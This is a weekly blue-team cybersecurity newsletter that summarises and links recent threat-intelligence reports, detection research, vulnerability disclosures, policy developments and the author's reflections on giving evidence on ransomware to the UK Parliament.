

Discover more from Cyber Defence Analysis for Blue & Purple Teams
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week it has all been about people playing with OpenAI and ChatGPT on social media. Well not entirely, but a lot. ChatGPT, prompt engineering and the underlying large language models are showing value in likely ways people didn’t envisage in cyber scenarios. Some examples from the fun this week include having it generate post exploitation payloads, having it generate Yara detection rules and finally having it boost reverse engineering productivty. Anyway the fun will subside but we have seen a glimpse of the future.
In the high-level this week:
NSA cyber director talks threats, opportunities - Rob Joyce delivers the wisdom.
Before the Invasion: Hunt Forward Operations in Ukraine - US basically say they knew what was coming so started work early - U.S. joint forces, in close cooperation with the government of Ukraine, conducted defensive cyber operations alongside Ukrainian Cyber Command personnel from December 2021 to March 2022, as part of a wider effort to contribute to enhancing the cyber resiliency in national critical networks.
Accountability and Multilateralism in Israel’s Approach to Cyber Diplomacy - Israel’s cyber co-ordinator from their Ministry of Foreign Affairs gives insights into the thinking and the machine that some are envious of.
EU decides to strengthen cybersecurity and resilience across the Union: Council adopts new legislation - NIS2 (or v2) is a thing i.e. security of network and information systems.
Cyber laws updated to boost UK’s resilience against online attacks - because the supply chain wasn’t always being entirely transparent - Outsourced IT providers will be brought into scope of cyber regulations to strengthen UK supply chains.
FinCEN Analysis Reveals Ransomware Reporting in Bank Secrecy Act (BSA) Filings Increased Significantly During the Second Half of 2021 - Roughly 75 percent of the ransomware-related incidents reported to FinCEN during the second half of 2021 pertained to Russia-related ransomware variants - $1.2 billion in suspected payments in 2021
UK Police forces overwhelmed and ineffective when it comes to digital forensics - from HM Inspectorate of Constabulary and Fire & Rescue Services. A harsh but interesting report on the challenges of scaling digital forensics in law enforcement.
NAIC Report Shows Premiums Grew 61% as Cyberthreats Rose in 2021 - released late in October but I only just became aware of it. Data from National Association of Insurance Commissioners (NAIC) in the US. Includes loss data - the net is there are clearly some suboptimal actuaries in the industry.
Latest draft report from the EU’s Committee of Inquiry to investigate the use of Pegasus and equivalent surveillance spyware - says "the discovery, sharing and exploitation of vulnerabilities have to be regulated" - but doesn't detail how.
A Hacked Newsroom Brings a Spyware Maker to U.S. Court - The New Yorker does what it does best.
El Faro Journalists, Knight Institute Sue NSO Group Over Spyware - related to the above 15 journalists and other members of El Faro, one of the leading sources of independent news in Central America, today filed suit in U.S. federal court against NSO Group
Flight of the Predator - Jet linked to Israeli spyware tycoon delivers surveillance tech from the EU to notorious Sudanese militia - not a great look
2023 China Security Report from the Japanese National Institute for Defence Studies - "concern about acts which combine cyberattacks and information warfare. They are seeing the emergence of an “APT + InfoOp” model combining information operations with hack and leak"
Simulated Internal Cyber Attack Gained Control of Critical Census Bureau Systems - a red team report release by the US Department of Commerce Office of Inspector General - Office of Audit and Evaluation. Could you imagine a world where all red team reports had be posted on the Internet like this? Radical transparency..
LastPass suffered a r.e. intrusion building on from their previous breach - interesting read and a lesson to the world on how to transparently deal with cyber disclosures 👏
Reflections this week are driven from the joy of interacting with those who don’t live cyber but hold enormous power and authority to help with the solutions. As I mentioned last week I was in the UK’s Parliament this week to give evidence on ransomware and I’ve been reflecting on how we ended being there (video here | transcript here) …
This isn’t a sole endeavour. What sits behind it in my day job is a public affairs team of Kat and Ro (who are world class) which sits historically within the Group CTOs portfolio. Now you might ask why does public affairs sit with the CTO? Well I championed it as a strategic tool for the firm to achieve our ultimate mission of making the world safer and more secure but with a technical edge and focus. Our endeavours started with Computer Misuse Act reform and then became much broader in terms of our aspirations. We saw there was a gap for highly technical individuals to contribute strategically to government thinking and policy whilst bringing an evidence base in pursuit of cyber as a science and overall resilience.
By engaging in this manner we aspired to influence future horizons, help shape government thinking and policy with evidence and in doing so maybe avoid the mistakes of the past and head off those of the future.
The journey has been amazing with various colleagues engaged in various ways to support some really knotty issues.
Anyway, long way of saying if the opportunity presents itself please do go for it. Our various countries need diverse expertise, perspectives and voices if we are to achieve our aims.
Enjoying this? don’t get via e-mail? subscribe:
Think someone else would benefit? Share:
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
RansomBoggs: New ransomware targeting Ukraine
Russia being active in Ukraine with “ransomware” by what is intimated as being a state actor and is in reality a wiper.
First detected on November 21st. Depending on the variant, RansomBoggs is detected by [our] products as MSIL/Filecoder.Sullivan.A and MSIL/Filecoder.RansomBoggs.A.
There are similarities with previous attacks conducted by Sandworm: a PowerShell script used to distribute the .NET ransomware from the domain controller
https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/
Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia
Ryan Tomcik, John Wolfram, Tommy Dacanay and Geoff Ackerman outline a campaign which shows an element of sophistication with regard to capability, distribution and also the used of signed binaries. This is not a toy..
[We] recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and we assess it has a China nexus.
Following initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE
https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia
New details on commercial spyware vendor Variston
Clement Lecigne and Benoit Sevens detail a Spanish commercial supplier of intrusion software which makes a change from Israel, Germany etc.
Note they have a focus on n-days. With the EU hyper focusing on the 0-days you can see how reality versus the theory diverge quite quickly. No we can’t regulate n-days..
[We have] been tracking the activities of commercial spyware vendors for years, using our research to improve the safety and security of Google’s products and share intelligence with our industry peers. TAG’s research underscores that the commercial surveillance industry is thriving and has expanded significantly in recent years, creating risk for Internet users around the globe. Commercial spyware puts advanced surveillance capabilities in the hands of governments who use them to spy on journalists, human rights activists, political opposition and dissidents. Google and TAG are committed to disrupting these threats, protecting users, and raising awareness of the risks posed by the growing commercial spyware industry.
Continuing this work, today, we’re sharing findings on an exploitation framework with likely ties to Variston IT, a company in Barcelona, Spain that claims to be a provider of custom security solutions. Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox and Microsoft Defender and provides all the tools necessary to deploy a payload to a target device.
https://blog.google/threat-analysis-group/new-details-on-commercial-spyware-vendor-variston/
Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank
Insight into an Iranian phishing campaign, the domains are really quite basic.
This report covers threat activity that is highly likely related to a broader campaign led by a suspected Iran-nexus threat activity group, TAG-56. This research is pertinent to individuals and organizations that cover Iranian cyber operations, IT security employees, members of think tanks, non-governmental organizations, journalists, and governments.
In early November 2022, [we] identified a phishing and follow-on credential theft attack highly likely led by an Iran-nexus threat activity group directed against the US-based Washington Institute think tank. The credential theft component masquerades as a Microsoft registration form for the 2022 Sir Bani Yas Forum hosted by the government of the United Arab Emirates (UAE).
Who’s swimming in South Korean waters? Meet ScarCruft’s Dolphin
Filip Jurčacko discusses a North Korean campaign active in South Korea. This is the upper end of their operations which is why they selectively deploy it.
[We] have analyzed a previously unreported backdoor used by the ScarCruft APT group. The backdoor, which we named Dolphin, has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers. Its functionality is reserved for selected targets, to which the backdoor is deployed after initial compromise using less advanced malware. In line with other ScarCruft tools, Dolphin abuses cloud storage services – specifically Google Drive – for C&C communication.
[Our] researchers analyzed Dolphin, a previously unreported backdoor used by the ScarCruft APT group.
Dolphin is deployed on selected targets only; it searches the drives of compromised systems for interesting files and exfiltrates them to Google Drive.
The backdoor was used as the final payload of a multistage attack in early 2021, involving a watering-hole attack on a South Korean online newspaper, an Internet Explorer exploit, and another ScarCruft backdoor, named BLUELIGHT.
Since the initial discovery of Dolphin in April 2021, [our] researchers have observed multiple versions of the backdoor, in which the threat actors improved the backdoor’s capabilities and made attempts to evade detection.
A notable feature of earlier Dolphin versions we analyzed is the ability to modify the settings of victims’ signed-in Google and Gmail accounts to lower their security.
https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/
Analysis of APT-C-55 (Kimsuky) attacks using IBM security products as bait
Chinese reporting on a North Korean actor who has adopted ISO tradecraft to circumvent Mark of the Web (MOTW). The fact they are dressing it up as IBM security products is just 👹
BabyShark is a Microsoft Visual Basic (VB) script-based malware family designed to gather sensitive information. The component was first discovered in 2019 and used to target US national security think tanks, and has since been used for espionage on nuclear security and national security issues on the Korean Peninsula. Recently, 360 Advanced Threat Research Institute captured an attack activity in which the APT-C-55 (Kimsuky) organization used IBM's security products as bait to deliver BabyShark attack components.
In this attack, the attacker delivered a malicious ISO file to the target, installed IBM security products through BAT scripts, and at the same time used BAT scripts to download malicious payloads and collect target host information.
The attack payload and sample communication format used in this attack match the characteristics of BabyShark components, so we attribute this attack to the APT-C-55 (Kimsuky) organization.
Malicious code distributed with disguised file names (RIGHT-TO-LEFT OVERRIDE)
South Korean reporting on a stealer campaign (i.e. likely criminal in this case) using a feature for non-western layouts (i.e right-to-left) to mask the actual file type. This tradecraft isn’t new and has been known about in the red team/defensive communities for over a decade.
In the method using RTLO, as a result of checking the detected malicious code through the company's ASD infrastructure, not only the disguised solution (.sln) file but also compressed files, test files, and video files existed. The most frequently detected distribution methods were files disguised as adult videos and movies, such as SCR.pm4, scr.vkm, and scr.iva, and it was confirmed that exe.rar, which disguised as a utility program, was distributed using torrents.
Decentralized Robbery: Dissecting the Nomad Bridge Hack and Following the Money
Randi Eitzman and Joe Dobson provide some great analysis of digital assets being punted around the block chain. In doing so they likely make Chain Analysis and Elliptic a little sad as they erode some of their unique selling point with regard to analysis capability using common off the shelf software.
[We] take a deeper look into how the Nomad bridge smart-contract was exploited.
We assess with high confidence that the addresses belonging to Group D (represented in black) belong to the same actor/group (Figure 10), and the amount stolen from the Nomad bridge totals around $54,506,000 in USD value at the time of analysis. The on-chain analysis shows the actor/group leveraging several decentralized swapping pools (liquidity pools found on decentralized exchanges used for token swapping), specifically, OrionPool, Uniswap, and Curve, to exchange the stolen funds for other tokens. The actor/group then sends some funds through TornadoCash and some into two separate deposit addresses (represented in purple). Out of the roughly $54 million stolen in the heist, approximately $50 million reside across the two purple deposit addresses.
https://www.mandiant.com/resources/blog/dissecting-nomad-bridge-hack
Emotet Strikes Again
DFIR Report doing what they do best with a retrospective from the summer. The execution chain is super complex.
In June of 2022, we observed a threat actor gaining access to an environment via Emotet and operating over a eight day period. During this time period, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk. The threat actors final actions included data exfiltration using Rclone and domain wide deployment of Quantum Ransomware.
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
Discovery
How we find and understand the latent compromises within our environments.
Identifying and Defending Against QakBot's Evolving TTPs
Scott Small shows how criminals can quickly evolve their tradecraft based on public reporting and bring into production to support their campaigns.
https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps
Get-InjectedThreadEx
John Uhlmann discusses detecting thread creation trampolines on Windows. This is really useful and a great research base to help impose further cost on adversaries commercial or otherwise.
The question I have is when we will start providing the same level of quality analysis and understanding for Linux and macOS etc.
At a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.
https://www.elastic.co/security-labs/get-injectedthreadex-detection-thread-creation-trampolines
BERT-Log
Song Chen and Hai Liao present some academic work on anomaly detection for system logs based on pre-trained language model. This is excellent work and has a whole host of possible applications..
Raw log messages are unstructured, which contain many different format texts. It is hard to detect numerous anomalies based on unstructured logs. This study proposes a BERT-Log method which can detect log anomalies automatically based on BERT pre-training language model. It can better capture semantic information from raw logs than previous LSTM, Bi-LSTM and Word2Vec methods. BERT-log consists of event template extractor, log semantic encoder, and log anomaly classifier. We evaluated our proposed method on two public log datasets: HDFS dataset and BGL dataset. The results show that BERT-Log-based method has got better performance than other anomaly detection methods.
https://www.tandfonline.com/doi/full/10.1080/08839514.2022.2145642
Fibratus 1.8.0
Nedim Šabić provides the latest release that comes with detection rules. This tool has been developed for a while now and is uber powerful. The detection rules as noted focus on specific tradecraft but you can see how they could be extended/applied to a host of other activity.
A tool for Windows kernel tracing and exploration focusing on runtime threat detection and prevention. Starting from this version, Fibratus is distributed with a catalog of detection rules built on top of the industry-recognized MITRE ATT&CK framework. This initial catalog is focused on credential access, defense evasion, and initial access tactics.
https://github.com/rabbitstack/fibratus/releases/tag/v1.8.0
Fusing Feature Engineering and Deep Learning
Daniel Gibert’s code is 6 months old but I highlight due to the performance value it brings.
This is the code implementing our approach for the paper "Fusing Feature Engineering and Deep Learning: A Case Study for Malware Classification". Using it, you can train the XGBoost model that achieved the highest 10-fold cross validation accuracy and lowest logarithmic loss on the Microsoft Malware Classification Challenge dataset..
IDAPython Script to decode NightHawk strings
Karsten Hahn releases this little work aid.
https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py
Defence
How we proactively defend our environments.
Building Policy Gate for DevSecOps using Open Policy Agent
Nikhil Mittal shows how to leverage OPA to implement Policy as Code. This is how we scale. I very much believe in Policy as Code as a huge force multiplier.
we decided to build a security policy engine using OPA to control the data produced by open-source tools to act as a gatekeeper so we can effectively control the success or failure of security workflow along with managing exceptions.
Multi-Key Total Memory Encryption on Windows 11 22H2
Jin Lin details a feature in Windows 11 which will kill some DMA attacks.
VM memory encryption with Intel’s Total Memory Encryption – Multi Key (TME-MK), providing hardware accelerated encryption of DRAM. With the latest Intel 12th Gen Core CPUs (Alder Lake) offering this capability, we are delighted to extend support in Windows 11 22H2 for TME-MK.
Accidentally Crashing a Botnet
Larry Cashdollar creates temptation for law enforcement who must not press enter.. or could go right ahead with a warrant!
[Our] researchers have continued their research on KmsdBot, a cryptomining botnet, and witnessed the authors accidentally crash it.
In our controlled environment, we were able to send commands to the bot to test its functionality and attack signatures.
As part of this analysis, a syntax error caused the bot to stop sending commands, effectively killing the botnet.
Since this particular botnet doesn’t seek persistence on a system, it can only continue its mission if it reinfects the system.
https://www.akamai.com/blog/security-research/kmsdbot-part-two-crashing-a-botnet
Vulnerability
Our attack surface.
Cisco Secure Email Gateways can easily be circumvented
An anonymous soul releases this vulnerability into the wild. Interesting it once again highlights the fact if you know the spec better that the software architecture and/or engineering teams and can think adversarialy you win.
Cisco Secure Email Gateways, formerly known as Cisco Ironport Email Security Appliances, that are configured to detect malicious email attachments, can easily be circumvented. A remote attacker can leverage error tolerance and different MIME decoding capabilities of email clients, compared with the gateway, to evade detection of malicious payloads by anti-virus components on the gateway.
https://seclists.org/fulldisclosure/2022/Nov/2
Unauthorised Changes to Secure Boot Settings for Acer
Affected Models: Acer Aspire A315-22, A115-21, A315-22G, Extensa EX215-21 and EX215-21G and oof!
Researchers have identified a vulnerability that may allow changes to Secure Boot settings by creating NVRAM variables (actual value of the variable is not important, only the existence is checked by the affected firmware drivers).
By disabling the Secure Boot feature, an attacker can load their own unsigned malicious bootloader to allow absolute control over the OS loading process. This can allow them to disable or bypass protections to silently deploy their own payloads with the system privileges.
Offense
Attack capability, techniques and tradecraft.
Making unphishable 2FA phishable
Matthew Garrett shows how RFC 8628 enables you to phish even when WebAuthn is present. Great work..
https://mjg59.dreamwidth.org/62175.html
Maintaining persistent access in a SaaS-first world
Luke Jennings from Push Security outlines four persistence mechanisms in a cloud first world. All very useful to ensure DFIR and SOC teams are aware of.
OAuth attack #1: Custom OAuth app integration
OAuth attack #2: SaaS platform integration
OAuth attack #3: Legitimate desktop/mobile app impersonation
Document-sharing links
https://pushsecurity.com/blog/maintaining-persistent-access-in-a-saas-first-world/
Exploitation
What is being exploited.
Android platform signing keys compromised
Google discloses this but without the details of which platforms are affected.
https://bugs.chromium.org/p/apvi/issues/detail?id=100
CVE-2022-4135: Google is aware that an exploit for exists in the wild for Chrome
Thank goodness for auto updates. Enterprises make sure you patch..
https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html
How security professionals are being attacked
Soufian El Yadmani, Robin The, Olga Gadyatskaya shows why you wouldn’t want to be a CISO of a large cyber security consultancy.
A study of malicious CVE proof of concept exploits in GitHub
In this work we investigate PoCs shared on GitHub for known vulnerabilities discovered in 2017-2021. We discovered that not all PoCs are trustworthy. Some proof-of-concepts are fake (i.e., they do not actually offer PoC functionality), or even malicious: e.g., they attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system.
To address this issue, we have proposed an approach to detect if a PoC is malicious. Our approach relies on detecting the symptoms we have observed in the collected dataset, for example, calls to malicious IP addresses, encoded malicious code, or included Trojanized binaries. With this approach, we have discovered 4893 malicious repository out of 47313 repositories that have been downloaded and checked (i.e., 10.3% of the studied repositories have symptoms of malicious intent). This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub.
https://arxiv.org/abs/2210.08374
Tooling and Techniques
Low level tooling for attack and defence researchers.
peafl64
Static Binary Instrumentation tool for Windows x64 executables
https://github.com/Sentinel-One/peafl64
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Threat Insights Report Q3 2022 - malware delivery method focus
December 2022 Army Magazine - featuring the evolution of Army Cyber Command
Dissecting Tensor Cores via Microbenchmarks: Latency, Throughput and numeric Behaviours
Password Portfolios and the Finite-Effort User: Sustainably Managing Large Numbers of Accounts - older paper but worth a reminder on why humans can’t remember all of those random passwords.
The Effect of International Proposals for Monitoring Obligations on End-to-End Encryption
scantxt - scanning mechanisms for opt-in/out, identification, verification, notification, and reporting
Sludge for Good: Slowing and Imposing Costs on Cyber Attackers - point of note is there is no data on efficacy
Related by a different team is Examining the Efficacy of Decoy-based and Psychological Cyber Deception with has a supporting article from January 2022
That’s all folks.. until next week..
Bluepurple Pulse: week ending December 4th
Great post Ollie! Excited for the ChapGPT stuff and it's applications for red teaming ;)